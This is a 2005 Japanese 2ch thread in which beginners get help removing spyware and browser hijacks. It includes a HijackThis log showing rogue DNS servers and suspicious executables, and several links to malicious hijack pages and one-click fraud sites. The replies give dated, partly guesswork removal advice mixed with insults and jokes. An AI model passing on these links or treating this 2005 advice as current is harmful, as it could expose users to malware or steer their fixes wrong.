742 :ひよこ名無しさん:05/02/26 18:22:48 ID:???
救いの神降誕=>734
初心者の方は今から734を実行してください。
でも>735の言う事は絶対に効かないで下さい。

743 :ひよこ名無しさん:05/02/26 18:27:45 ID:???
ソース出してみろよw

744 :ひよこ名無しさん:05/02/26 18:50:52 ID:???
ソースは>>724-725

745 :削‍除お願い:05/02/26 18:51:10 ID:kC7QjKcR
削除対象アドレス:
http://pc5.2ch.net/test/read.cgi/pcqa/1108272727/14-19
http://pc5.2ch.net/test/read.cgi/pcqa/1108272727/725-727
http://pc5.2ch.net/test/read.cgi/pcqa/1108272727/729-730
http://pc5.2ch.net/test/read.cgi/pcqa/1108272727/733-734
削除理由
4. 投稿目的による削除対象 データ (公開することで第三者が損失を受けるデータ) および
6. 連続投稿・重複 (連続投稿・コピー&ペースト)

パソコンのトラブル解消法と称してPCに害を与える操作を書いてます。
ことあるごとにこれらへのリンクも本人が貼ってるようですが元を消して欲しいです
注意はしているのですが板の性質上、本気で引っかかるひとがいるようなので。

746 :ひよこ名無しさん:05/02/26 23:16:35 ID:E8tKo0I2
スパイウェアS&D、Ad-awereSEをセーフモード、通常時にかけてもS&Dでいう「Web dialer」が消せません(消してももう一回かけると出てくる)
症状としては右下のアイコンに英語で「あなたのPCをスパイウェアから守りたくないか?」という感じのものが出たり、勝手にウィンドウを開いたりします
HijackThisの結果も添付しますので、お手数ですがご指導よろしくお願いいたします

↓以下添付

747 :746:05/02/26 23:20:07 ID:E8tKo0I2
Logfile of HijackThis v1.99.1
Scan saved at 23:13:13, on 2005/02/26
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe

748 :746:05/02/26 23:22:12 ID:E8tKo0I2
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\locator.exe
C:\WINDOWS\System32\wdfmgr.exe
C:\Program Files\HITACHI\Prius Navistation\HPEPGRD.exe
C:\Program Files\HITACHI\Prius Navistation\PriNaviSSrv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\FTMKEY.exe
C:\Program Files\HITACHI\Prius Navistation\PESCDL.exe
C:\Program Files\MouseWare\system\em_exec.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\FTKDisp.exe
C:\WINDOWS\FTMGET.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\connmie.exe
C:\WINDOWS\System32\truettf.exe
C:\WINDOWS\System32\dxconf.exe
C:\WINDOWS\System32\conime.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Documents and Settings\Adati\デスクトップ\HijackThis.exe


749 :746:05/02/26 23:26:56 ID:E8tKo0I2
2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {2819F3B5-4C76-41F8-810C-6080D8C48EA9} - C:\WINDOWS\System32\sfcman32.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [Multimedia Keyboard] FTMKEY.exe
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [PESCDL.EXE] "C:\Program Files\HITACHI\Prius Navistation\PESCDL.exe"
O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe

750 :746:05/02/26 23:27:30 ID:E8tKo0I2
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: このページのキャッシュ - res://c:\program files\google\GoogleToolbar2.dll/cmcache.html
O8 - Extra context menu item: リンク元 - res://c:\program files\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: 関連ページ - res://c:\program files\google\GoogleToolbar2.dll/cmsimilar.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O14 - IERESET.INF: START_PAGE_URL=http://prius.hitachi.co.jp/go/prius/index.htm
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {A16C2BF4-501E-45FA-8A14-F26E022D5E16} (MidRadioCtrl Class) - http://adweb.music-eclub.com/php/adweb.php3?aid=143&arg=win%2Fmrinst.cab&ptx=mratdl

751 :ひよこ名無しさん:05/02/26 23:28:23 ID:???

































752 :746:05/02/26 23:28:25 ID:E8tKo0I2
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D8D107F-F394-4377-8A60-F8F8DD8F6A9E}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CCS\Services\Tcpip\..\{CE8D0BC7-6A44-4D64-9F32-3E7D2B15B47F}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CCS\Services\Tcpip\..\{F77640A0-8F9C-41F2-BDF9-75E4379813B0}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D8D107F-F394-4377-8A60-F8F8DD8F6A9E}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D8D107F-F394-4377-8A60-F8F8DD8F6A9E}: NameServer = 69.50.176.196,195.225.176.37
O18 - Protocol: msjwwdat - {BAAB02DC-913E-40AA-B9ED-8068DEE42CFA} - C:\Program Files\Microsoft Office\Home Style\JWW\JWWData.dll
O18 - Filter: text/x-mrml - {C51721BE-858B-4A66-A8BF-D2882FF49820} - C:\Program Files\YAMAHA\MidRadio Player\MidRadio.ocx
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: BeatJam Music Server - HTTP (BeatJamMusicStreamingServer) - Justsystem Corporation - C:\Program Files\JUSTSYSTEM\BeatJam Music Server\BeatJamHttpService.exe
O23 - Service: BeatJam Music Server - UPnP (BeatJamUPnPMusicServer) - Justsystem Corporation - C:\Program Files\JUSTSYSTEM\BeatJam Music Server\BeatJamUPnPService.exe
O23 - Service: HITACHI HPEPGRD (HPEPGRD) - Unknown owner - C:\Program Files\HITACHI\Prius Navistation\HPEPGRD.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Common Files\Sony Shared\AVLib\Pacsptisvr.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\Sptisrv.exe


以上です 大量に投下してしまい申し訳ないです

753 :ひよこ名無しさん:05/02/26 23:55:10 ID:???
久しぶりにログ見てるんでかなり勘が…

悪さしてるのは
C:\WINDOWS\System32\connmie.exe
C:\WINDOWS\System32\truettf.exe
C:\WINDOWS\System32\dxconf.exe
と見たけど、どれが呼んでんだこれ?

一応
O2 - BHO: (no name) - {2819F3B5-4C76-41F8-810C-6080D8C48EA9} - C:\WINDOWS\System32\sfcman32.dll
はアウト臭いが


754 :ひよこ名無しさん:05/02/27 00:02:05 ID:???
これもかな
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D8D107F-F394-4377-8A60-F8F8DD8F6A9E}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CCS\Services\Tcpip\..\{CE8D0BC7-6A44-4D64-9F32-3E7D2B15B47F}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CCS\Services\Tcpip\..\{F77640A0-8F9C-41F2-BDF9-75E4379813B0}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D8D107F-F394-4377-8A60-F8F8DD8F6A9E}: NameServer = 69.50.176.196,195.225.176.37
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D8D107F-F394-4377-8A60-F8F8DD8F6A9E}: NameServer = 69.50.176.196,195.225.176.37

もしこのエントリ消して再起動したあとネットに繋げなくなったら、
Hijackthisのバックアップから戻して。

755 :ひよこ名無しさん:05/02/27 00:09:15 ID:???
工エエェェ(´д`)ェェエエ工

756 :ひよこ名無しさん:05/02/27 00:09:20 ID:???
こいつは正規のインスコ場所じゃないようだがウイルススキャンかけないとわからんな
C:\Program Files\MouseWare\system\em_exec.exe

757 :ひよこ名無しさん:05/02/27 00:12:13 ID:???
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

758 :ひよこ名無しさん:05/02/27 00:14:37 ID:???
:::::::::::::::::...... ....:::::::゜::::::::::..   (___ )(___ ) ::::。::::::::::::::::: ゜.::::::::::::
:. .:::::。:::........ . .::::::::::::::::: _ i/ = =ヽi :::::::::::::。::::::::::: . . . ..::::
:::: :::::::::.....:☆彡::::    //[||    」  ||] ::>>746 ::::::::::::::
 :::::::::::::::::: . . . ..: :::: / ヘ | |  ____,ヽ | | :::::::::::.... .... .. .::::::::::::::
::::::...゜ . .:::::::::  /ヽ ノ    ヽ__/  ....... . .::::::::::::........ ..::::
:.... .... .. .     く  /     三三三∠⌒>:.... .... .. .:.... .... ..
:.... .... ..:.... .... ..... .... .. .:.... .... .. .... . .... . ..... .... .. ..... ............. ..
:.... . ∧∧   ∧∧  ∧∧   ∧∧ .... .... .. .:.... .... ..... .... .. .
... ..:(   )ゝ (   )ゝ(   )ゝ(   )ゝ ムチャシヤガッテ・・・......
....  i⌒ /   i⌒ /  i⌒ /   i⌒ / .. ..... ................... .. . ...
..   三  |   三  |   三  |   三 |
...  ∪ ∪   ∪ ∪   ∪ ∪  ∪ ∪

759 :ひよこ名無しさん:05/02/27 00:35:42 ID:???
>>746
これじゃね?
ttp://66.102.7.104/search?q=cache:fYwPHGEvdSoJ:www5.ocn.ne.jp/~ys2001/page2w.html++%22Web+dialer%22&hl=ja&lr=lang_ja&inlang=ja

760 :746:05/02/27 01:03:30 ID:pAFGR46R
早速のご回答感謝いたします
>>753-754
試してみますね
>>759
開いていいんだろうかこれw怖くて踏めません

761 :759:05/02/27 01:13:48 ID:???
>>760
googleのキャッシュ
「Web dialer」の消し方が載ってる

762 :746:05/02/27 01:22:17 ID:pAFGR46R
>>761
ありがとうございます 

BHO(Noname〜)が消しても再生しやがるので激しく怪しいですね
C:\WINDOWS\System32\connmie.exe
C:\WINDOWS\System32\truettf.exe
C:\WINDOWS\System32\dxconf.exe
もまとめて消してみます

763 :746:05/02/27 01:36:10 ID:pAFGR46R
消えたーーーーーー!!!!!!!

>>753-754様、ならびに>>759
本当にありがとうございました!


>>758
orz

皆様には何度お礼を申し上げても足りないくらいです、本当に本当に助かりました
ありがとうございました

764 :ひよこ名無しさん:05/02/27 01:49:56 ID:???
>>763
うむ。報告ご苦労。

765 :ひよこ名無しさん:05/02/27 02:15:11 ID:???
こういう風に質問すればわかりやすいな
きちんと最後まで報告してるし

766 :ぼるじょあ ◆yBEncckFOU :05/02/27 02:36:09 ID:???

(・3・) エェー よいこの質問待ってるYO♪

ぼるじょあ(・3・)質問箱 セキュ板出張所12
http://pc5.2ch.net/test/read.cgi/sec/1105933333/

ウィルス情報&質問 総合スレッド☆Part28
http://pc5.2ch.net/test/read.cgi/sec/1108718666/

セキュリティ初心者質問スレッドpart52
http://pc5.2ch.net/test/read.cgi/sec/1108260790/

【総合】スパイウェア予防駆除 Part6
http://pc5.2ch.net/test/read.cgi/sec/1108613740/

(・3・) エェー よいこの相談待ってるYO♪

767 :ひよこ名無しさん:05/02/27 10:01:17 ID:WZ6PtzMT
450じゃないんですがウィルスにやられて色々あってその後boln.dllを
削除したんですがそうしたら起動時にRUNDLLがboln.dllが見つからないと
エラーメッセージを出す様になってしまいました。解決策をご教授いただけないでしょうか?

768 :ひよこ名無しさん:05/02/27 10:15:51 ID:???
>>767
HijackThisでboln.dllの登録情報を削除すれば?

769 :ひよこ名無しさん:05/02/27 10:28:00 ID:Xmx1qRNQ


770 :ひよこ名無しさん:05/02/27 10:28:33 ID:Xmx1qRNQ


771 :ひよこ名無しさん:05/02/27 10:28:55 ID:???
すいませんが、質問ですエロ画像をクリックしたら
いきなり登録とでました。業者はIPなどからこちらの住所
を割ることはできますか?


772 :ひよこ名無しさん:05/02/27 10:30:34 ID:Xmx1qRNQ


773 :ひよこ名無しさん:05/02/27 10:31:09 ID:???
>>771
おおまかにならできるけど、IPくらいで
そんな気にすることないよ。
あと、業者の方も交通費がでるから直接集金なんて来ないらしいよ。

774 :771:05/02/27 10:31:25 ID:???
ちなみに解決しました。

775 :ひよこ名無しさん:05/02/27 10:32:13 ID:???
>>774
解決おめ

776 :773:05/02/27 10:32:25 ID:???
>>774
てめぇぬっ殺すぞこらー

777 :ひよこ名無しさん:05/02/27 10:36:22 ID:???
請求書を送ってくるということはありますか?
何にも情報は打ち込んでなくてただ登録完了とでたのですが

778 :ひよこ名無しさん:05/02/27 10:57:02 ID:???
はやく教えてください豚共

779 :ひよこ名無しさん:05/02/27 11:01:00 ID:???
>>778
喪前も暇なやつだなー

780 :ひよこ名無しさん:05/02/27 11:07:21 ID:???
778はいろいろなところにカキコしてますね・・・・
よっぽど暇+友達いないんですか?
なんなら出会い系いったらどうですか?

781 :767:05/02/27 11:40:08 ID:WZ6PtzMT
>>768
レスありがとうございます。HijackThisなんですが素人目にはどれを削除して
いいものなのか解らないのです…
HKLM\..\Run: [Systems Restart] Rundll32.exe boln.dll, DllRegisterServer
これ削除しちゃっていいんでしょうか?

782 :ひよこ名無しさん:05/02/27 12:45:09 ID:???
>>781
それでいい。
万一必要なものを間違って削除しても、HijackThisで
簡単に元に戻せるようになってるから初心者にすすめてる。

783 :767:05/02/27 13:06:34 ID:WZ6PtzMT
ありがとうございます。解決しました

784 :ひよこ名無しさん:05/02/27 13:09:09 ID:???
>777
ない。
心配なら生活消費センターか警察に相談汁。

785 :ひよこ名無しさん:05/02/27 13:26:45 ID:???
ハイジャックのログの上の方のって消せないのな
ランニングプロセスの後 どうやって消すの?

786 :ひよこ名無しさん:05/02/27 13:47:30 ID:???
あそこは何らかの手段で起動されたプロセスのリストだから
そのプロセスが起動される仕組み(いろいろある)を突き止めて断たないと‥

787 :ひよこ名無しさん:05/02/27 13:55:59 ID:???
なるほど 下のほうの番号付を消して直さないといけないのか

788 :ひよこ名無しさん:05/02/27 15:40:39 ID:???
>>777 このHPの「悪質なサイト」って部分読んでみれば。
ttp://outbreak.kt.fc2.com/index.html

789 :ひよこ名無しさん:05/02/27 19:33:51 ID:BLJvc8pB
http://music4.2ch.net/test/read.cgi/musicj/1108386506/
ここの>>241をクリックしちゃったのですが、お金払わないといけないのですか?

790 :ひよこ名無しさん:05/02/27 19:39:01 ID:???
ホームページが変更できません。IEを開くと必ず
ttp://213.159.117.134/index.php
のページが表示されてしまい、何かのファイルをインストールするように仕向けられます。
どうすれば変更できるんでしょうか?


791 :ひよこ名無しさん:05/02/27 19:48:00 ID:???
213.159.117.134 でこのスレ検索

792 :ひよこ名無しさん:05/02/27 19:52:13 ID:???
>>790
馬鹿には直せない。残念だったな。

793 :ひよこ名無しさん:05/02/27 19:56:06 ID:???
>>792
お前にも無理ってことか サンクスw

794 :ひよこ名無しさん:05/02/27 20:01:31 ID:???
>>793
はいさいなら。

795 :ひよこ名無しさん:05/02/27 20:06:06 ID:???
>>791
ありがとうございました。何とか直せたみたいです。本当に助かりました。
ふー・・・良かった良かった。

796 :ひよこ名無しさん:05/02/27 20:09:37 ID:???
黙れクズ共

797 :ひよこ名無しさん:05/02/27 20:11:41 ID:???
天才初心者参上!!10分で直しちゃったよ
111

798 :ひよこ名無しさん:05/02/27 21:37:25 ID:KKAOuTBl
たまに字が書けなくなる(キーボードが使えなくなる)のですが、スパイウェアですか?
字がかけなくなり、「ピロピロ・・・」と、ウィンドウを開く音(?)がでるんです。
書けたと思ったら「g@j、「」とか、分けの分からない字がでたりします。
失礼ですが、本当の初心者なのでできれば分かりやすい言葉で教えてください。お願いします。
OS・XP

799 :ひよこ名無しさん:05/02/27 21:48:08 ID:???
最近、よく電源が勝手に切れるんですけど、そうゆう類のウイルスってあるん
ですか?あったら、対処法をおねがいします。



800 :ひよこ名無しさん:05/02/27 22:06:27 ID:???
800

801 :ひよこ名無しさん:05/02/27 22:16:01 ID:???
>>799
ネコという名のウイルス

802 :ひよこ名無しさん:05/02/27 22:19:48 ID:???
>>799
Sasserとかは切れるってよ

803 :ひよこ名無しさん:05/02/27 22:23:07 ID:???
>>799
佐々淳行のことじゃないよ 念のため

804 :ひよこ名無しさん:05/02/27 22:25:09 ID:???
>>799
Sasser ワームの対策
http://www.microsoft.com/japan/security/incident/sasser.mspx
元内閣安全保障室長 佐々淳行
http://www.tokyo-np.co.jp/doyou/text/d50.html

805 :岡本悠:05/02/27 22:55:37 ID:oCQTY+On
SpybotとかAdwareって別にスパイウェア気にしてなければ
入れなくてもいいの?
入れないとPCやばくなる?

806 :ひよこ名無しさん:05/02/28 02:38:37 ID:Gfvv5tPw
パソコン初心者質問スレで誘導されてきました。

質問なんですが、IEを起動して普通にインターネットをしてると
いきなり全部のウインドウが閉じて、海外のサイトに勝手に接続されます。
スパイウェアだと思って、Adwareを使いましたが解決できませんでした。
お願いします。

807 :ひよこ名無しさん:05/02/28 02:41:13 ID:???
ここの回答者は早寝ですよ。

808 :ひよこ名無しさん:05/02/28 02:48:25 ID:???
エロサイト巡りはこれからですよ

>>806
Adwareで発見されなかったのか?
Spybotはどうよ?ウイルスチェックも

809 :806:05/02/28 02:50:32 ID:Gfvv5tPw
Adwareでは何回もやったんですが毎回といっていいほど検出されます。
ウイルスに関しては特に問題はないです。

810 :ひよこ名無しさん:05/02/28 02:59:13 ID:???
>>809
検出されたなら、テンプレ>>2からを試せば消せると思うんだけど

811 :ひよこ名無しさん:05/02/28 08:06:07 ID:???
>>805
通報しますた

812 :ひよこ名無しさん:05/02/28 11:04:50 ID:rfyAibYH
>>745
すみません。みましたが自分パソコン用語とかまったくわからないので
ちょっと困ってます。とりあえず全画面に検索とかツールバーとか全部なくなってしまって消す
こともできずに困ってます。


813 :ひよこ名無しさん:05/02/28 11:05:28 ID:rfyAibYH
>>745は間違えです。とにかく困ってるので教えてください

814 :ひよこ名無しさん:05/02/28 11:08:00 ID:???
>>813
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。

815 :812:05/02/28 11:09:32 ID:rfyAibYH
>>814
すみません。忘れてました。とりあえずあんまパソコン用語とか詳しくないので
真面目に困ってるのでお願いします。

816 :ひよこ名無しさん:05/02/28 11:11:23 ID:???
頭悪いなこいつ

817 :ひよこ名無しさん:05/02/28 11:11:46 ID:???
>>815
812で745氏に質問してるけど、何の関係があるのか不明。

818 :ひよこ名無しさん:05/02/28 11:13:00 ID:???
何を?つーか誰?

819 :812:05/02/28 11:14:33 ID:rfyAibYH
>>817
745は間違えです。違うスレで聞いてそのままコピーしたの
貼り付けたので残ってしまったのです。

820 :ひよこ名無しさん:05/02/28 11:21:27 ID:???
>>819
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)

821 :ひよこ名無しさん:05/02/28 12:00:13 ID:???
F11押したとかいうんならヌッコロヌ

822 :ひよこ名無しさん:05/02/28 13:10:49 ID:???
>>821
F11押していました スミマセン

823 :ひよこ名無しさん:05/02/28 14:42:16 ID:rnO/KpA0
OS:WinXP ブラウザ:IEです。

ttp://www.tiduru.sytes.net/img-box/img20040727015957.jpg

昨夜これを踏んだところ、デスクトップにFree XXXというアイコンが出て、消しても消しても再起動すると出てくるようになってしまいました。
また、インターネットを立ち上げようとするとヤフーに繋がるはずがhttp;67;15;70;15/black/fuckporn.html というサイトに繋がってしまいます…。
プロパティから修復してもこのサイトに繋がってしまいどうしてよいか分かりません。

PC初心者です。姉のPCでやってしまい今は別のPCからですが本当に困ってます。
どなたかお願いします…。


824 :ひよこ名無しさん:05/02/28 14:44:52 ID:???
>>823
まずテンプレを実行
ただし禁断のテンプレはやるなよ

825 :823:05/02/28 14:55:52 ID:rnO/KpA0
>>824
やってみます。すんません。

826 :823:05/02/28 15:38:55 ID:rnO/KpA0
テンプレ8)をやったところ直ったみたいです。
何とか姉にばれずに済みそうです。
ありがとうございました。

827 :ひよこ名無しさん:05/02/28 15:49:38 ID:???
ダークロリータに引っ掛かる人多いな

828 :ひよこ名無しさん:05/02/28 20:05:03 ID:???
>>804と愉快な仲間たち
サンクスれす!!

829 :ひよこ名無しさん:05/02/28 20:56:32 ID:???
今IE開いた最初のページが何回設定しても、「about:blank」になってしまう
スパイウェアに罹ってるんですが、その状態でマイクロソフトのHPにいくと
何度も弾かれて「about:blank」に飛ばされるんですが、やはりスパイウェアを
先に削除しないとダメですかね?

830 :ひよこ名無しさん:05/02/28 21:37:15 ID:???
そうだねぇ。 MS以外のサイトは見れるってんならテンプレの 9) をまずやってみれ。

831 :ひよこ名無しさん:05/02/28 21:56:54 ID:???
変なサイトを踏んでしまい
ホームが変なサイトになってしまいました。
勿論テンプレに載ってる方法を試してみましたが
最初は直るのですが数分たつとまたその変なサイトに設定されてしまいます。
それにお気に入りにも不明なサイトが追加されてしまいます。
何度消しても数分後にまたお気に入り登録されています・・・


832 :831:05/02/28 21:57:49 ID:???
以上、日記でした。

833 :ひよこ名無しさん:05/02/28 22:26:46 ID:???
.dllないし.ocxを最初にアンインストールしてやらないとダメだねえ

834 :ひよこ名無しさん:05/02/28 22:56:34 ID:???
そんなのハナクソ丸めてポイッ

835 :ひよこ名無しさん:05/02/28 22:58:53 ID:???
>>831
まずは小魚を食べてカルシウムをとれ

836 :ひよこ名無しさん:05/03/01 00:42:22 ID:???
さかなさかなさかな〜さかな〜を食べ〜ると〜♪

837 :ひよこ名無しさん:05/03/01 01:01:46 ID:???
変なサイトに入ってしまってホームページアドレスが
http://213.159.117.134/index.phpというところに変えられてしまいました。
それに伴いFreeXXXというアプリケーションも表示されました。
テンプレ通りウェブ設定のリセットやアンインストールしたのですがアプリのほうは
再起動するたびに表示が出てしまい、ブラウザのほうは全く直りません
もしよろしければ直し方のご教授お願いします。


838 :ひよこ名無しさん:05/03/01 01:15:06 ID:???
>>837
とりあえずここ見れ。 ほんで、なおったらWindowsUpdateしろ
http://www.higaitaisaku.com/remove213159.html

839 :ひよこ名無しさん:05/03/01 01:15:45 ID:???
>>837
保存したH画像をすべて削除

840 :ひよこ名無しさん:05/03/01 01:29:11 ID:EJETwdUh
あーーーー
>>837と全く一緒で困ってます。
とりあえず、>>838に行ってみます。
PC無知な私なので、また質問させて頂くかも?です。
その時はよろしく。
>>839 Hサイトではないんだけどな。2chで踏んだと思われる。

841 :ひよこ名無しさん:05/03/01 01:31:26 ID:???
>>838
>>839
カキコありがとうございます、ですが↑の被害対策へのページを表示できません
と出てしまいます

842 :837:05/03/01 01:32:20 ID:???
すいません>>837です

843 :ひよこ名無しさん:05/03/01 01:34:41 ID:???
>>841
スクリプトをぶっ壊されているだけだろ
アドレス窓にコピペしろ

844 :837:05/03/01 01:37:09 ID:???
出ました、細かいご指示感謝します

845 :837:05/03/01 01:52:20 ID:???
状況説明:CWShredderによるCoolWebSearchの除去というのを見て
Download the stand-alone version of CWShredderをインストール後
CWShredderの実行までしました。その後にブラウザを変えてみて(YAHOO)
再起動したらYAHOOのままでした。
これは直ったんでしょうか?

846 :ひよこ名無しさん:05/03/01 01:59:12 ID:???
>>845
「Yahooをホームに設定しても変わらなかった! うれP〜」 という意味? なら治ったんだろね‥
ま、ほかのもんも入ってる可能性があるからテンプレの 1) 2) 4) 5) 7) 10) + WindowsUpdate

847 :837:05/03/01 02:15:50 ID:???
直ればもういいです。でゎおやすみなさい!

848 :あり:05/03/01 02:18:53 ID:???
冬になってもキリギリスなんて放置だぞ、あいつら夏じゅう遊んでやがったんだ

849 :837:05/03/01 02:19:25 ID:???
アップデートまでしました。その後も異常ありませんでした
こんなに早く終わるものだと思っていなかったので正直驚き。。。
色々と親切にありがとうございました。

850 :840:05/03/01 02:25:13 ID:EJETwdUh
なんで>>837さんはそんなに早いんだろうか…
アップデートだけでも時間がかかって仕方がないんだけど。。。
今までメンテしてなかった自業自得でしょうか…
あぁ、、、夜が明けそ。

851 :840:05/03/01 02:26:59 ID:EJETwdUh
あ。
>>837さん!
HOMEが治ったってことでしたが、XXXのアプリの方も無事消失したんでしょうか??

852 :ひよこ名無しさん:05/03/01 02:32:28 ID:???
http://getts.site.ne.jp/member/kiyaku.php
サンプル動画をクリックしたら、いきなりホスト
検出されて利用規約がでてきました。↑ブラクラ
じゃないです(見なくても結構です)
ワンクリック詐欺ですか?
単純に言うと4マン振り込めと・・
ただ、↑にアクセスした後、今まで見れなかった
他のサイトの動画は見れるんです。不安・・・
アドバイスお願いします

853 :840:05/03/01 02:41:32 ID:EJETwdUh
恐ろしく重いんです…PC。
OSはWinxpです。
文字の変換にも間が必要、、ってなくらいに。
なんなんでしょうか??


854 :ひよこ名無しさん:05/03/01 02:49:50 ID:???
>>853
タスクマネージャを起動して各プロセスのCPU使用率を見れ
スパイウェアだらけだ

855 :ひよこ名無しさん:05/03/01 02:53:53 ID:???
アリさんとキリギリスさんの違いはなんなんだろうね?
アリさんはそこそこにウィンドウズアップデートをしていたから、
スパイウェアてんこ盛りインストーラーを食らっても、
それらを全部インストールされなかった。
キリギリスさんは見事に全部インストールされてしまった。

856 :840:05/03/01 03:13:37 ID:???
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━━┛┃|i||!i┏┓i|!
